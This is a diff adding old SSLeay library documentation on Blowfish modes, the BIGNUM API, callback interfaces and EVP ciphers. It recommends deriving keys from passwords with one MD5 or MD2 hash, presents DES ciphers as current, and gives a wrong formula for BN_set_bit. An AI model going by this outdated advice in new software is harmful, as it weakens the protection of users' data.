+	things will probably happen.  ivec is the initialisation vector.
+	This function updates iv after each call so that it can be passed to
+	the next call to BF_cbc_encrypt().
+	
+void BF_cfb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+BF_KEY *schedule,
+unsigned char *ivec,
+int *num,
+int encrypt);
+	This is one of the more useful functions in this Blowfish library, it
+	implements CFB mode of Blowfish with 64bit feedback.
+	This allows you to encrypt an arbitrary number of bytes,
+	you do not require 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  Num contains 'how far' we are though ivec.
+	'Encrypt' is used to indicate encryption or decryption.
+	CFB64 mode operates by using the cipher to generate a stream
+	of bytes which is used to encrypt the plain text.
+	The cipher text is then encrypted to generate the next 64 bits to
+	be xored (incrementally) with the next 64 bits of plain
+	text.  As can be seen from this, to encrypt or decrypt,
+	the same 'cipher stream' needs to be generated but the way the next
+	block of data is gathered for encryption is different for
+	encryption and decryption.
+	
+void BF_ofb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+BF_KEY *schedule,
+unsigned char *ivec,
+int *num);
+	This functions implements OFB mode of Blowfish with 64bit feedback.
+	This allows you to encrypt an arbitrary number of bytes,
+	you do not require 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  Num contains 'how far' we are though ivec.
+	This is in effect a stream cipher, there is no encryption or
+	decryption mode.
+	
+For reading passwords, I suggest using des_read_pw_string() from my DES library.
+To generate a password from a text string, I suggest using MD5 (or MD2) to
+produce a 16 byte message digest that can then be passed directly to
+BF_set_key().
+
+=====
+For more information about the specific Blowfish modes in this library
+(ecb, cbc, cfb and ofb), read the section entitled 'Modes of DES' from the
+documentation on my DES library.  What is said about DES is directly
+applicable for Blowfish.
+
+
+==== bn.doc ========================================================
+
+The Big Number library.
+
+#include "bn.h" when using this library.
+
+This big number library was written for use in implementing the RSA and DH
+public key encryption algorithms.  As such, features such as negative
+numbers have not been extensively tested but they should work as expected.
+This library uses dynamic memory allocation for storing its data structures
+and so there are no limit on the size of the numbers manipulated by these
+routines but there is always the requirement to check return codes from
+functions just in case a memory allocation error has occurred.
+
+The basic object in this library is a BIGNUM.  It is used to hold a single
+large integer.  This type should be considered opaque and fields should not
+be modified or accessed directly.
+typedef struct bignum_st
+	{
+	int top;	/* Index of last used d. */
+	BN_ULONG *d;	/* Pointer to an array of 'BITS2' bit chunks. */
+	int max;	/* Size of the d array. */
+	int neg;
+	} BIGNUM;
+The big number is stored in a malloced array of BN_ULONG's.  A BN_ULONG can
+be either 16, 32 or 64 bits in size, depending on the 'number of  bits'
+specified in bn.h. 
+The 'd' field is this array.  'max' is the size of the 'd' array that has
+been allocated.  'top' is the 'last' entry being used, so for a value of 4,
+bn.d[0]=4 and bn.top=1.  'neg' is 1 if the number is negative.
+When a BIGNUM is '0', the 'd' field can be NULL and top == 0.
+
+Various routines in this library require the use of 'temporary' BIGNUM
+variables during their execution.  Due to the use of dynamic memory
+allocation to create BIGNUMs being rather expensive when used in
+conjunction with repeated subroutine calls, the BN_CTX structure is
+used.  This structure contains BN_CTX BIGNUMs.  BN_CTX
+is the maximum number of temporary BIGNUMs any publicly exported 
+function will use.
+
+#define BN_CTX	12
+typedef struct bignum_ctx
+	{
+	int tos;			/* top of stack */
+	BIGNUM *bn[BN_CTX];	/* The variables */
+	} BN_CTX;
+
+The functions that follow have been grouped according to function.  Most
+arithmetic functions return a result in the first argument, sometimes this
+first argument can also be an input parameter, sometimes it cannot.  These
+restrictions are documented.
+
+extern BIGNUM *BN_value_one;
+There is one variable defined by this library, a BIGNUM which contains the
+number 1.  This variable is useful for use in comparisons and assignment.
+
+Get Size functions.
+
+int BN_num_bits(BIGNUM *a);
+	This function returns the size of 'a' in bits.
+	
+int BN_num_bytes(BIGNUM *a);
+	This function (macro) returns the size of 'a' in bytes.
+	For conversion of BIGNUMs to byte streams, this is the number of
+	bytes the output string will occupy.  If the output byte
+	format specifies that the 'top' bit indicates if the number is
+	signed, so an extra '0' byte is required if the top bit on a
+	positive number is being written, it is upto the application to
+	make this adjustment.  Like I said at the start, I don't
+	really support negative numbers :-).
+
+Creation/Destruction routines.
+
+BIGNUM *BN_new();
+	Return a new BIGNUM object.  The number initially has a value of 0.  If
+	there is an error, NULL is returned.
+	
+void	BN_free(BIGNUM *a);
+	Free()s a BIGNUM.
+	
+void	BN_clear(BIGNUM *a);
+	Sets 'a' to a value of 0 and also zeros all unused allocated
+	memory.  This function is used to clear a variable of 'sensitive'
+	data that was held in it.
+	
+void	BN_clear_free(BIGNUM *a);
+	This function zeros the memory used by 'a' and then free()'s it.
+	This function should be used to BN_free() BIGNUMS that have held
+	sensitive numeric values like RSA private key values.  Both this
+	function and BN_clear tend to only be used by RSA and DH routines.
+
+BN_CTX *BN_CTX_new(void);
+	Returns a new BN_CTX.  NULL on error.
+	
+void	BN_CTX_free(BN_CTX *c);
+	Free a BN_CTX structure.  The BIGNUMs in 'c' are BN_clear_free()ed.
+	
+BIGNUM *bn_expand(BIGNUM *b, int bits);
+	This is an internal function that should not normally be used.  It
+	ensures that 'b' has enough room for a 'bits' bit number.  It is
+	mostly used by the various BIGNUM routines.  If there is an error,
+	NULL is returned. if not, 'b' is returned.
+	
+BIGNUM *BN_copy(BIGNUM *to, BIGNUM *from);
+	The 'from' is copied into 'to'.  NULL is returned if there is an
+	error, otherwise 'to' is returned.
+
+BIGNUM *BN_dup(BIGNUM *a);
+	A new BIGNUM is created and returned containing the value of 'a'.
+	NULL is returned on error.
+
+Comparison and Test Functions.
+
+int BN_is_zero(BIGNUM *a)
+	Return 1 if 'a' is zero, else 0.
+
+int BN_is_one(a)
+	Return 1 is 'a' is one, else 0.
+
+int BN_is_word(a,w)
+	Return 1 if 'a' == w, else 0.  'w' is a BN_ULONG.
+
+int BN_cmp(BIGNUM *a, BIGNUM *b);
+	Return -1 if 'a' is less than 'b', 0 if 'a' and 'b' are the same
+	and 1 is 'a' is greater than 'b'.  This is a signed comparison.
+	
+int BN_ucmp(BIGNUM *a, BIGNUM *b);
+	This function is the same as BN_cmp except that the comparison
+	ignores the sign of the numbers.
+	
+Arithmetic Functions
+For all of these functions, 0 is returned if there is an error and 1 is
+returned for success.  The return value should always be checked.  eg.
+if (!BN_add(r,a,b)) goto err;
+Unless explicitly mentioned, the 'return' value can be one of the
+'parameters' to the function.
+
+int BN_add(BIGNUM *r, BIGNUM *a, BIGNUM *b);
+	Add 'a' and 'b' and return the result in 'r'.  This is r=a+b.
+	
+int BN_sub(BIGNUM *r, BIGNUM *a, BIGNUM *b);
+	Subtract 'a' from 'b' and put the result in 'r'. This is r=a-b.
+	
+int BN_lshift(BIGNUM *r, BIGNUM *a, int n);
+	Shift 'a' left by 'n' bits.  This is r=a*(2^n).
+	
+int BN_lshift1(BIGNUM *r, BIGNUM *a);
+	Shift 'a' left by 1 bit.  This form is more efficient than
+	BN_lshift(r,a,1).  This is r=a*2.
+	
+int BN_rshift(BIGNUM *r, BIGNUM *a, int n);
+	Shift 'a' right by 'n' bits.  This is r=int(a/(2^n)).
+	
+int BN_rshift1(BIGNUM *r, BIGNUM *a);
+	Shift 'a' right by 1 bit.  This form is more efficient than
+	BN_rshift(r,a,1).  This is r=int(a/2).
+	
+int BN_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b);
+	Multiply a by b and return the result in 'r'. 'r' must not be
+	either 'a' or 'b'.  It has to be a different BIGNUM.
+	This is r=a*b.
+
+int BN_sqr(BIGNUM *r, BIGNUM *a, BN_CTX *ctx);
+	Multiply a by a and return the result in 'r'. 'r' must not be
+	'a'.  This function is alot faster than BN_mul(r,a,a).  This is r=a*a.
+
+int BN_div(BIGNUM *dv, BIGNUM *rem, BIGNUM *m, BIGNUM *d, BN_CTX *ctx);
+	Divide 'm' by 'd' and return the result in 'dv' and the remainder
+	in 'rem'.  Either of 'dv' or 'rem' can be NULL in which case that
+	value is not returned.  'ctx' needs to be passed as a source of
+	temporary BIGNUM variables.
+	This is dv=int(m/d), rem=m%d.
+	
+int BN_mod(BIGNUM *rem, BIGNUM *m, BIGNUM *d, BN_CTX *ctx);
+	Find the remainder of 'm' divided by 'd' and return it in 'rem'.
+	'ctx' holds the temporary BIGNUMs required by this function.
+	This function is more efficient than BN_div(NULL,rem,m,d,ctx);
+	This is rem=m%d.
+
+int BN_mod_mul(BIGNUM *r, BIGNUM *a, BIGNUM *b, BIGNUM *m,BN_CTX *ctx);
+	Multiply 'a' by 'b' and return the remainder when divided by 'm'.
+	'ctx' holds the temporary BIGNUMs required by this function.
+	This is r=(a*b)%m.
+
+int BN_mod_exp(BIGNUM *r, BIGNUM *a, BIGNUM *p, BIGNUM *m,BN_CTX *ctx);
+	Raise 'a' to the 'p' power and return the remainder when divided by
+	'm'.  'ctx' holds the temporary BIGNUMs required by this function.
+	This is r=(a^p)%m.
+
+int BN_reciprocal(BIGNUM *r, BIGNUM *m, BN_CTX *ctx);
+	Return the reciprocal of 'm'.  'ctx' holds the temporary variables
+	required.  This function returns -1 on error, otherwise it returns
+	the number of bits 'r' is shifted left to make 'r' into an integer.
+	This number of bits shifted is required in BN_mod_mul_reciprocal().
+	This is r=(1/m)<<(BN_num_bits(m)+1).
+	
+int BN_mod_mul_reciprocal(BIGNUM *r, BIGNUM *x, BIGNUM *y, BIGNUM *m, 
+	BIGNUM *i, int nb, BN_CTX *ctx);
+	This function is used to perform an efficient BN_mod_mul()
+	operation.  If one is going to repeatedly perform BN_mod_mul() with
+	the same modulus is worth calculating the reciprocal of the modulus
+	and then using this function.  This operation uses the fact that
+	a/b == a*r where r is the reciprocal of b.  On modern computers
+	multiplication is very fast and big number division is very slow.
+	'x' is multiplied by 'y' and then divided by 'm' and the remainder
+	is returned.  'i' is the reciprocal of 'm' and 'nb' is the number
+	of bits as returned from BN_reciprocal().  Normal usage is as follows.
+	bn=BN_reciprocal(i,m);
+	for (...)
+		{ BN_mod_mul_reciprocal(r,x,y,m,i,bn,ctx); }
+	This is r=(x*y)%m.  Internally it is approximately
+	r=(x*y)-m*(x*y/m) or r=(x*y)-m*((x*y*i) >> bn)
+	This function is used in BN_mod_exp() and BN_is_prime().
+
+Assignment Operations
+
+int BN_one(BIGNUM *a)
+	Set 'a' to hold the value one.
+	This is a=1.
+	
+int BN_zero(BIGNUM *a)
+	Set 'a' to hold the value zero.
+	This is a=0.
+	
+int BN_set_word(BIGNUM *a, unsigned long w);
+	Set 'a' to hold the value of 'w'.  'w' is an unsigned long.
+	This is a=w.
+
+unsigned long BN_get_word(BIGNUM *a);
+	Returns 'a' in an unsigned long.  Not remarkably, often 'a' will
+	be bigger than a word, in which case 0xffffffffL is returned.
+
+Word Operations
+These functions are much more efficient that the normal bignum arithmetic
+operations.
+
+BN_ULONG BN_mod_word(BIGNUM *a, unsigned long w);
+	Return the remainder of 'a' divided by 'w'.
+	This is return(a%w).
+	
+int BN_add_word(BIGNUM *a, unsigned long w);
+	Add 'w' to 'a'.  This function does not take the sign of 'a' into
+	account.  This is a+=w;
+	
+Bit operations.
+
+int BN_is_bit_set(BIGNUM *a, int n);
+	This function return 1 if bit 'n' is set in 'a' else 0.
+
+int BN_set_bit(BIGNUM *a, int n);
+	This function sets bit 'n' to 1 in 'a'. 
+	This is a&= ~(1<<n);
+
+int BN_clear_bit(BIGNUM *a, int n);
+	This function sets bit 'n' to zero in 'a'.  Return 0 if less
+	than 'n' bits in 'a' else 1.  This is a&= ~(1<<n);
+
+int BN_mask_bits(BIGNUM *a, int n);
+	Truncate 'a' to n bits long.  This is a&= ~((~0)<<n)
+
+Format conversion routines.
+
+BIGNUM *BN_bin2bn(unsigned char *s, int len,BIGNUM *ret);
+	This function converts 'len' bytes in 's' into a BIGNUM which
+	is put in 'ret'.  If ret is NULL, a new BIGNUM is created.
+	Either this new BIGNUM or ret is returned.  The number is
+	assumed to be in bigendian form in 's'.  By this I mean that
+	to 'ret' is created as follows for 'len' == 5.
+	ret = s[0]*2^32 + s[1]*2^24 + s[2]*2^16 + s[3]*2^8 + s[4];
+	This function cannot be used to convert negative numbers.  It
+	is always assumed the number is positive.  The application
+	needs to diddle the 'neg' field of th BIGNUM its self.
+	The better solution would be to save the numbers in ASN.1 format
+	since this is a defined standard for storing big numbers.
+	Look at the functions
+
+	ASN1_INTEGER *BN_to_ASN1_INTEGER(BIGNUM *bn, ASN1_INTEGER *ai);
+	BIGNUM *ASN1_INTEGER_to_BN(ASN1_INTEGER *ai,BIGNUM *bn);
+	int i2d_ASN1_INTEGER(ASN1_INTEGER *a,unsigned char **pp);
+	ASN1_INTEGER *d2i_ASN1_INTEGER(ASN1_INTEGER **a,unsigned char **pp,
+		long length;
+
+int BN_bn2bin(BIGNUM *a, unsigned char *to);
+	This function converts 'a' to a byte string which is put into
+	'to'.  The representation is big-endian in that the most
+	significant byte of 'a' is put into to[0].  This function
+	returns the number of bytes used to hold 'a'.  BN_num_bytes(a)
+	would return the same value and can be used to determine how
+	large 'to' needs to be.  If the number is negative, this
+	information is lost.  Since this library was written to
+	manipulate large positive integers, the inability to save and
+	restore them is not considered to be a problem by me :-).
+	As for BN_bin2bn(), look at the ASN.1 integer encoding funtions
+	for SSLeay.  They use BN_bin2bn() and BN_bn2bin() internally.
+	
+char *BN_bn2ascii(BIGNUM *a);
+	This function returns a malloc()ed string that contains the
+	ascii hexadecimal encoding of 'a'.  The number is in bigendian
+	format with a '-' in front if the number is negative.
+
+int BN_ascii2bn(BIGNUM **bn, char *a);
+	The inverse of BN_bn2ascii.  The function returns the number of
+	characters from 'a' were processed in generating a the bignum.
+	error is inticated by 0 being returned.  The number is a
+	hex digit string, optionally with a leading '-'.  If *bn
+	is null, a BIGNUM is created and returned via that variable.
+	
+int BN_print_fp(FILE *fp, BIGNUM *a);
+	'a' is printed to file pointer 'fp'.  It is in the same format
+	that is output from BN_bn2ascii().  0 is returned on error,
+	1 if things are ok.
+
+int BN_print(BIO *bp, BIGNUM *a);
+	Same as BN_print except that the output is done to the SSLeay libraries
+	BIO routines.  BN_print_fp() actually calls this function.
+
+Miscellaneous Routines.
+
+int BN_rand(BIGNUM *rnd, int bits, int top, int bottom);
+	This function returns in 'rnd' a random BIGNUM that is bits
+	long.  If bottom is 1, the number returned is odd.  If top is set,
+	the top 2 bits of the number are set.  This is useful because if
+	this is set, 2 'n; bit numbers multiplied together will return a 2n
+	bit number.  If top was not set, they could produce a 2n-1 bit
+	number.
+
+BIGNUM *BN_mod_inverse(BIGNUM *a, BIGNUM *n,BN_CTX *ctx);
+	This function create a new BIGNUM and returns it.  This number
+	is the inverse mod 'n' of 'a'.  By this it is meant that the
+	returned value 'r' satisfies (a*r)%n == 1.  This function is
+	used in the generation of RSA keys.  'ctx', as per usual,
+	is used to hold temporary variables that are required by the
+	function.  NULL is returned on error.
+
+int BN_gcd(BIGNUM *r,BIGNUM *a,BIGNUM *b,BN_CTX *ctx);
+	'r' has the greatest common divisor of 'a' and 'b'.  'ctx' is
+	used for temporary variables and 0 is returned on error.
+
+int BN_is_prime(BIGNUM *p,int nchecks,void (*callback)(),BN_CTX *ctx,
+	char *cb_arg);
+	This function is used to check if a BIGNUM ('p') is prime.
+	It performs this test by using the Miller-Rabin randomised
+	primality test.  This is a probalistic test that requires a
+	number of rounds to ensure the number is prime to a high
+	degree of probability.  Since this can take quite some time, a
+	callback function can be passed and it will be called each
+	time 'p' passes a round of the prime testing.  'callback' will
+	be called as follows, callback(1,n,cb_arg) where n is the number of
+	the round, just passed.  As per usual 'ctx' contains temporary
+	variables used.  If ctx is NULL, it does not matter, a local version
+	will be malloced.  This parameter is present to save some mallocing
+	inside the function but probably could be removed.
+	0 is returned on error.
+	'ncheck' is the number of Miller-Rabin tests to run.  It is
+	suggested to use the value 'BN_prime_checks' by default.
+
+BIGNUM *BN_generate_prime(
+int bits,
+int strong,
+BIGNUM *a,
+BIGNUM *rems,
+void (*callback)());
+char *cb_arg
+	This function is used to generate prime numbers.  It returns a
+	new BIGNUM that has a high probability of being a prime.
+	'bits' is the number of bits that
+	are to be in the prime.  If 'strong' is true, the returned prime
+	will also be a strong prime ((p-1)/2 is also prime).
+	While searching for the prime ('p'), we
+	can add the requirement that the prime fill the following
+	condition p%a == rem.  This can be used to help search for
+	primes with specific features, which is required when looking
+	for primes suitable for use with certain 'g' values in the
+	Diffie-Hellman key exchange algorithm.  If 'a' is NULL,
+	this condition is not checked.  If rem is NULL, rem is assumed
+	to be 1.  Since this search for a prime
+	can take quite some time, if callback is not NULL, it is called
+	in the following situations.
+	We have a suspected prime (from a quick sieve),
+	callback(0,sus_prime++,cb_arg). Each item to be passed to BN_is_prime().
+	callback(1,round++,cb_arg).  Each successful 'round' in BN_is_prime().
+	callback(2,round,cb_arg). For each successful BN_is_prime() test.
+
+Hints
+-----
+
+DSA wants 64*32 to use word mont mul, but RSA wants to use full.
+
+==== callback.doc ========================================================
+
+Callback functions used in SSLeay.
+
+--------------------------
+The BIO library.  
+
+Each BIO structure can have a callback defined against it.  This callback is
+called 2 times for each BIO 'function'.  It is passed 6 parameters.
+BIO_debug_callback() is an example callback which is defined in
+crypto/buffer/bio_cb.c and is used in apps/dgst.c  This is intended mostly
+for debuging or to notify the application of IO.
+
+long BIO_debug_callback(BIO *bio,int cmd,char *argp,int argi,long argl,
+	long ret);
+bio is the BIO being called, cmd is the type of BIO function being called.
+Look at the BIO_CB_* defines in buffer.h.  Argp and argi are the arguments
+passed to BIO_read(), BIO_write, BIO_gets(), BIO_puts().  In the case of
+BIO_ctrl(), argl is also defined.  The first time the callback is called,
+before the underlying function has been executed, 0 is passed as 'ret', and
+if the return code from the callback is not > 0, the call is aborted
+and the returned <= 0 value is returned.
+The second time the callback is called, the 'cmd' value also has
+BIO_CB_RETURN logically 'or'ed with it.  The 'ret' value is the value returned
+from the actuall function call and whatever the callback returns is returned
+from the BIO function.
+
+BIO_set_callback(b,cb) can be used to set the callback function
+(b is a BIO), and BIO_set_callback_arg(b,arg) can be used to
+set the cb_arg argument in the BIO strucutre.  This field is only intended
+to be used by application, primarily in the callback function since it is
+accessable since the BIO is passed.
+
+--------------------------
+The PEM library.
+
+The pem library only really uses one type of callback,
+static int def_callback(char *buf, int num, int verify);
+which is used to return a password string if required.
+'buf' is the buffer to put the string in.  'num' is the size of 'buf'
+and 'verify' is used to indicate that the password should be checked.
+This last flag is mostly used when reading a password for encryption.
+
+For all of these functions, a NULL callback will call the above mentioned
+default callback.  This default function does not work under Windows 3.1.
+For other machines, it will use an application defined prompt string
+(EVP_set_pw_prompt(), which defines a library wide prompt string)
+if defined, otherwise it will use it's own PEM password prompt.
+It will then call EVP_read_pw_string() to get a password from the console.
+If your application wishes to use nice fancy windows to retrieve passwords,
+replace this function.  The callback should return the number of bytes read
+into 'buf'.  If the number of bytes <= 0, it is considered an error.
+
+Functions that take this callback are listed below.  For the 'read' type
+functions, the callback will only be required if the PEM data is encrypted.
+
+For the Write functions, normally a password can be passed in 'kstr', of
+'klen' bytes which will be used if the 'enc' cipher is not NULL.  If
+'kstr' is NULL, the callback will be used to retrieve a password.
+
+int PEM_do_header (EVP_CIPHER_INFO *cipher, unsigned char *data,long *len,
+	int (*callback)());
+char *PEM_ASN1_read_bio(char *(*d2i)(),char *name,BIO *bp,char **x,int (*cb)());
+char *PEM_ASN1_read(char *(*d2i)(),char *name,FILE *fp,char **x,int (*cb)());
+int PEM_ASN1_write_bio(int (*i2d)(),char *name,BIO *bp,char *x,
+	EVP_CIPHER *enc,unsigned char *kstr,int klen,int (*callback)());
+int PEM_ASN1_write(int (*i2d)(),char *name,FILE *fp,char *x,
+	EVP_CIPHER *enc,unsigned char *kstr,int klen,int (*callback)());
+STACK *PEM_X509_INFO_read(FILE *fp, STACK *sk, int (*cb)());
+STACK *PEM_X509_INFO_read_bio(BIO *fp, STACK *sk, int (*cb)());
+
+#define	PEM_write_RSAPrivateKey(fp,x,enc,kstr,klen,cb)
+#define	PEM_write_DSAPrivateKey(fp,x,enc,kstr,klen,cb)
+#define	PEM_write_bio_RSAPrivateKey(bp,x,enc,kstr,klen,cb)
+#define	PEM_write_bio_DSAPrivateKey(bp,x,enc,kstr,klen,cb)
+#define	PEM_read_SSL_SESSION(fp,x,cb)
+#define	PEM_read_X509(fp,x,cb)
+#define	PEM_read_X509_REQ(fp,x,cb)
+#define	PEM_read_X509_CRL(fp,x,cb)
+#define	PEM_read_RSAPrivateKey(fp,x,cb)
+#define	PEM_read_DSAPrivateKey(fp,x,cb)
+#define	PEM_read_PrivateKey(fp,x,cb)
+#define	PEM_read_PKCS7(fp,x,cb)
+#define	PEM_read_DHparams(fp,x,cb)
+#define	PEM_read_bio_SSL_SESSION(bp,x,cb)
+#define	PEM_read_bio_X509(bp,x,cb)
+#define	PEM_read_bio_X509_REQ(bp,x,cb)
+#define	PEM_read_bio_X509_CRL(bp,x,cb)
+#define	PEM_read_bio_RSAPrivateKey(bp,x,cb)
+#define	PEM_read_bio_DSAPrivateKey(bp,x,cb)
+#define	PEM_read_bio_PrivateKey(bp,x,cb)
+#define	PEM_read_bio_PKCS7(bp,x,cb)
+#define	PEM_read_bio_DHparams(bp,x,cb)
+int i2d_Netscape_RSA(RSA *a, unsigned char **pp, int (*cb)());
+RSA *d2i_Netscape_RSA(RSA **a, unsigned char **pp, long length, int (*cb)());
+
+Now you will notice that macros like
+#define PEM_write_X509(fp,x) \
+                PEM_ASN1_write((int (*)())i2d_X509,PEM_STRING_X509,fp, \
+		                        (char *)x, NULL,NULL,0,NULL)
+Don't do encryption normally.  If you want to PEM encrypt your X509 structure,
+either just call PEM_ASN1_write directly or just define your own
+macro variant.  As you can see, this macro just sets all encryption related
+parameters to NULL.
+
+
+--------------------------
+The SSL library.
+
+#define SSL_set_info_callback(ssl,cb)
+#define SSL_CTX_set_info_callback(ctx,cb)
+void callback(SSL *ssl,int location,int ret)
+This callback is called each time around the SSL_connect()/SSL_accept() 
+state machine.  So it will be called each time the SSL protocol progresses.
+It is mostly present for use when debugging.  When SSL_connect() or
+SSL_accept() return, the location flag is SSL_CB_ACCEPT_EXIT or
+SSL_CB_CONNECT_EXIT and 'ret' is the value about to be returned.
+Have a look at the SSL_CB_* defines in ssl.h.  If an info callback is defined
+against the SSL_CTX, it is called unless there is one set against the SSL.
+Have a look at
+void client_info_callback() in apps/s_client() for an example.
+
+Certificate verification.
+void SSL_set_verify(SSL *s, int mode, int (*callback) ());
+void SSL_CTX_set_verify(SSL_CTX *ctx,int mode,int (*callback)());
+This callback is used to help verify client and server X509 certificates.
+It is actually passed to X509_cert_verify(), along with the SSL structure
+so you have to read about X509_cert_verify() :-).  The SSL_CTX version is used
+if the SSL version is not defined.  X509_cert_verify() is the function used
+by the SSL part of the library to verify certificates.  This function is
+nearly always defined by the application.
+
+void SSL_CTX_set_cert_verify_cb(SSL_CTX *ctx, int (*cb)(),char *arg);
+int callback(char *arg,SSL *s,X509 *xs,STACK *cert_chain);
+This call is used to replace the SSLeay certificate verification code.
+The 'arg' is kept in the SSL_CTX and is passed to the callback.
+If the callback returns 0, the certificate is rejected, otherwise it
+is accepted.  The callback is replacing the X509_cert_verify() call.
+This feature is not often used, but if you wished to implement
+some totally different certificate authentication system, this 'hook' is
+vital.
+
+SSLeay keeps a cache of session-ids against each SSL_CTX.  These callbacks can
+be used to notify the application when a SSL_SESSION is added to the cache
+or to retrieve a SSL_SESSION that is not in the cache from the application.
+#define SSL_CTX_sess_set_get_cb(ctx,cb)
+SSL_SESSION *callback(SSL *s,char *session_id,int session_id_len,int *copy);
+If defined, this callback is called to return the SESSION_ID for the
+session-id in 'session_id', of 'session_id_len' bytes.  'copy' is set to 1
+if the server is to 'take a copy' of the SSL_SESSION structure.  It is 0
+if the SSL_SESSION is being 'passed in' so the SSLeay library is now
+responsible for 'free()ing' the structure.  Basically it is used to indicate
+if the reference count on the SSL_SESSION structure needs to be incremented.
+
+#define SSL_CTX_sess_set_new_cb(ctx,cb)
+int callback(SSL *s, SSL_SESSION *sess);
+When a new connection is established, if the SSL_SESSION is going to be added
+to the cache, this callback is called.  Return 1 if a 'copy' is required,
+otherwise, return 0.  This return value just causes the reference count
+to be incremented (on return of a 1), this means the application does
+not need to worry about incrementing the refernece count (and the
+locking that implies in a multi-threaded application).
+
+void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx,int (*cb)());
+This sets the SSL password reading function.
+It is mostly used for windowing applications
+and used by PEM_read_bio_X509() and PEM_read_bio_RSAPrivateKey()
+calls inside the SSL library.   The only reason this is present is because the
+calls to PEM_* functions is hidden in the SSLeay library so you have to
+pass in the callback some how.
+
+#define SSL_CTX_set_client_cert_cb(ctx,cb)
+int callback(SSL *s,X509 **x509, EVP_PKEY **pkey);
+Called when a client certificate is requested but there is not one set
+against the SSL_CTX or the SSL.  If the callback returns 1, x509 and
+pkey need to point to valid data.  The library will free these when
+required so if the application wants to keep these around, increment
+their reference counts.  If 0 is returned, no client cert is
+available.  If -1 is returned, it is assumed that the callback needs
+to be called again at a later point in time.  SSL_connect will return
+-1 and SSL_want_x509_lookup(ssl) returns true.  Remember that
+application data can be attached to an SSL structure via the
+SSL_set_app_data(SSL *ssl,char *data) call.
+
+--------------------------
+The X509 library.
+
+int X509_cert_verify(CERTIFICATE_CTX *ctx,X509 *xs, int (*cb)(),
+	int *error,char *arg,STACK *cert_chain);
+int verify_callback(int ok,X509 *xs,X509 *xi,int depth,int error,char *arg,
+	STACK *cert_chain);
+
+X509_cert_verify() is used to authenticate X509 certificates.  The 'ctx' holds
+the details of the various caches and files used to locate certificates.
+'xs' is the certificate to verify and 'cb' is the application callback (more
+detail later).  'error' will be set to the error code and 'arg' is passed
+to the 'cb' callback.  Look at the VERIFY_* defines in crypto/x509/x509.h
+
+When ever X509_cert_verify() makes a 'negative' decision about a
+certitificate, the callback is called.  If everything checks out, the
+callback is called with 'VERIFY_OK' or 'VERIFY_ROOT_OK' (for a self
+signed cert that is not the passed certificate).
+
+The callback is passed the X509_cert_verify opinion of the certificate 
+in 'ok', the certificate in 'xs', the issuer certificate in 'xi',
+the 'depth' of the certificate in the verification 'chain', the
+VERIFY_* code in 'error' and the argument passed to X509_cert_verify()
+in 'arg'. cert_chain is a list of extra certs to use if they are not
+in the cache.
+
+The callback can be used to look at the error reason, and then return 0
+for an 'error' or '1' for ok.  This will override the X509_cert_verify()
+opinion of the certificates validity.  Processing will continue depending on
+the return value.  If one just wishes to use the callback for informational
+reason, just return the 'ok' parameter.
+
+--------------------------
+The BN and DH library.
+
+BIGNUM *BN_generate_prime(int bits,int strong,BIGNUM *add,
+	BIGNUM *rem,void (*callback)(int,int));
+int BN_is_prime(BIGNUM *p,int nchecks,void (*callback)(int,int),
+
+Read doc/bn.doc for the description of these 2.
+
+DH *DH_generate_parameters(int prime_len,int generator,
+	void (*callback)(int,int));
+Read doc/bn.doc for the description of the callback, since it is just passed
+to BN_generate_prime(), except that it is also called as
+callback(3,0) by this function.
+
+--------------------------
+The CRYPTO library.
+
+void CRYPTO_set_locking_callback(void (*func)(int mode,int type,char *file,
+	int line));
+void CRYPTO_set_add_lock_callback(int (*func)(int *num,int mount,
+	int type,char *file, int line));
+void CRYPTO_set_id_callback(unsigned long (*func)(void));
+
+Read threads.doc for info on these ones.
+
+
+==== cipher.doc ========================================================
+
+The Cipher subroutines.
+
+These routines require "evp.h" to be included.
+
+These functions are a higher level interface to the various cipher
+routines found in this library.  As such, they allow the same code to be
+used to encrypt and decrypt via different ciphers with only a change
+in an initial parameter.  These routines also provide buffering for block
+ciphers.
+
+These routines all take a pointer to the following structure to specify
+which cipher to use.  If you wish to use a new cipher with these routines,
+you would probably be best off looking an how an existing cipher is
+implemented and copying it.  At this point in time, I'm not going to go
+into many details.  This structure should be considered opaque
+
+typedef struct pem_cipher_st
+	{
+	int type;
+	int block_size;
+	int key_len;
+	int iv_len;
+	void (*enc_init)();	/* init for encryption */
+	void (*dec_init)();	/* init for decryption */
+	void (*do_cipher)();	/* encrypt data */
+	} EVP_CIPHER;
+	
+The type field is the object NID of the cipher type
+(read the section on Objects for an explanation of what a NID is).
+The cipher block_size is how many bytes need to be passed
+to the cipher at a time.  Key_len is the
+length of the key the cipher requires and iv_len is the length of the
+initialisation vector required.  enc_init is the function
+called to initialise the ciphers context for encryption and dec_init is the
+function to initialise for decryption (they need to be different, especially
+for the IDEA cipher).
+
+One reason for specifying the Cipher via a pointer to a structure
+is that if you only use des-cbc, only the des-cbc routines will
+be included when you link the program.  If you passed an integer
+that specified which cipher to use, the routine that mapped that
+integer to a set of cipher functions would cause all the ciphers
+to be link into the code.  This setup also allows new ciphers
+to be added by the application (with some restrictions).
+
+The thirteen ciphers currently defined in this library are
+
+EVP_CIPHER *EVP_des_ecb();     /* DES in ecb mode,     iv=0, block=8, key= 8 */
+EVP_CIPHER *EVP_des_ede();     /* DES in ecb ede mode, iv=0, block=8, key=16 */
+EVP_CIPHER *EVP_des_ede3();    /* DES in ecb ede mode, iv=0, block=8, key=24 */
+EVP_CIPHER *EVP_des_cfb();     /* DES in cfb mode,     iv=8, block=1, key= 8 */
+EVP_CIPHER *EVP_des_ede_cfb(); /* DES in ede cfb mode, iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_des_ede3_cfb();/* DES in ede cfb mode, iv=8, block=1, key=24 */
+EVP_CIPHER *EVP_des_ofb();     /* DES in ofb mode,     iv=8, block=1, key= 8 */
+EVP_CIPHER *EVP_des_ede_ofb(); /* DES in ede ofb mode, iv=8, block=1, key=16 */
+EVP_CIPHER *EVP_des_ede3_ofb();/* DES in ede ofb mode, iv=8, block=1, key=24 */
+EVP_CIPHER *EVP_des_cbc();     /* DES in cbc mode,     iv=8, block=8, key= 8 */
